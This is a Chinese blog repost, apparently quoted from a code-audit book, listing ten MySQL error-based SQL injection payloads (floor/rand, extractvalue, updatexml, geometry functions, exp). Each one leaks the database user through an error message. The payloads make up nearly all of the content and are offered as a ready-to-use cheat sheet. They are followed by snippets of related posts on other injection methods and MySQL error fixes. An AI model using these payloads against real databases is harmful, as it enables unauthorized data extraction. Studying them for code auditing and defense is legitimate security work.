2. 程式人生 > >十種MySQL報錯注入

十種MySQL報錯注入

阿新 發佈:2019-01-17

以下均摘自《程式碼審計:企業級Web程式碼安全架構》一書

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

相關推薦

MySQL注入

以下均摘自《程式碼審計:企業級Web程式碼安全架構》一書 1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*

Mysql注入簡單測試模型

測試Mysql環境:Mysql 5.7.12-log Mysql Community Server(GPL) 1、收集內建函式 http://dev.mysql.com/doc/refman/5.7/en/dynindex-function.html 2、整理列表 select A

Mysql 注入的原理探索

我們一般使用的報錯語句: 1 select count(*),concat((select version()),floor(rand()*2))a from information_schema.tables group by a; concat:為聚合函式,連線字串功能

MySQL注入方法整理

mysql暴錯注入方法整理,通過floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。 報錯注入:(and後不能直接跟select,可以加()) 1.報錯注入floor-

Mysql注入原理分析(count()、rand()、group by)

可以看到floor(rand(0)*2)是有規律的,而且是固定的,這個就是上面提到的由於是確定性才導致的報錯,那為何會報錯呢,我們接著往下看。 0x05 count與group by的虛擬表 使用select count(*) from `T-Safe` group by x;這種語句的時候我們經

經典的MySQL Duplicate entry注入

SQL注射取資料的方式有多種: 利用union select查詢直接在頁面上返回資料,這種最為常見,一個前提是攻擊者能夠構造閉合的查詢。  Oracle中利用監聽UTL_HTTP.request發起的HTTP請求,把QuerySet反彈回攻擊者的主機。當然,HTTP伺

MYSQL高版本注入技巧-利用NAME_CONST注入

 and (select count(*) from mysql.user)>0/* 1、檢視MYSQL版本 and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(

MySQL:Last_Errno: 1008 | Last_SQL_Errno: 1008

mysqlMySQL主從復制不能同步,查看slave狀態,報錯如下:mysql> show slave status \G *************************** 1. row *************************** Slave_IO_Sta

mysqlMulti-statement transaction required more than 'max_binlog_cache_size' bytes of storage

.cn nbsp 導致 variable ria sed size log more mysql報錯Multi-statement transaction required more than ‘max_binlog_cache_size‘ bytes of storage

解決mysql:- Expression #1 of ORDER BY clause is not in GROUP BY clause and contains nonaggregated column 'information_schema.PROFILING.SEQ'

_for tran contains column schema mysql eat table express mysql執行報錯: - Expression #1 of ORDER BY clause is not in GROUP BY clause and cont

MySQL】ERROR 1558 (HY000): Column count of mysql.user is wrong. Expected 43, found 39.

found src 正常 err erro count blog 查找 版本 原文參考:http://wuzhuti.cn/2348.html 之前在centos6.4系統安裝的是自帶的mysql 5.1版本,後來升級到了5.6版本,執行以下命令報錯 在網上查找原因說說因

mysql

mysql1. 環境說明CentOS 6.5[[email protected]/* */ ~]# uname -aLinux linux-mysql02 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64

MYSQL註入方法整理

ipo poi floor extra 版本 註入 關鍵字 -1 format 1、通過floor暴錯 /*數據庫版本*/ SQL http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*)

MySQL _DATA_TYPE_INVALID_

index.php tro 大小 usr main 直接 rar 註意 ica 報錯如下: Fatal error: Uncaught Exception: _DATA_TYPE_INVALID_ :[status=>0] in /usr/local/nginx/ht

啟動mysql -- ERROR! The server quit without updating PID file

bash cal down tar bsp 二進制 pda you log-bin 開發說某個測試環境的mysql,無法重啟了,報以下錯誤提示: # service mysqld restart Shutting down MySQL.. SUCCESS! Starti

win處navicat直接導出的sql腳本導入Linux mysql問題

錯誤 www. nbsp 提取 xxx .com 根目錄 打開 win 最近幾天在把win上的項目的數據庫轉移到Ubuntu,於是第一件事就是從win處的navicat直接導出sql腳本,然後進入Ubuntu導入的時候會報錯誤,跳過錯誤繼續執行導致數據庫表的缺失。 跨平臺錯

遠程登陸mysql:ERROR 1130 (HY000): Host '10.0.0.8' is not allowed to connect to this MySQL server

image code 再次 light 解決辦法 allow this 解決 ror 問題原因:在數據庫遷移到mysql主機後遠程登陸mysql報錯: ERROR 1130 (HY000): Host ‘10.0.0.8‘ is not allowed to connec

ubuntu安裝mysql

nbsp blog 2-2 mic png sof es2017 alt microsoft ubuntu換源後安裝mysql報錯: 原因:版本高,不兼容,只需要還原apt下載源,然後 sudo apt-get install mysql-server即可正常安裝mysq

Docker中啟動mysql: Failed to get D-Bus connection

-- oop 鏡像文件 com port oot roo 生成 systemctl docker版本:[root@localhost ~]# docker versionClient: Version: 1.10.3 API version: 1.2

安裝 MySQL -bash: mysql: command not found

line 系統 color size all linux下 back mil 完整 安裝MySQL後(安裝文件),不能直接在命令行中mysql。因為命令行直接查找的是/usr/local/bin下邊的命令,需要我們把mysql的命令放到.bash_profile中。vim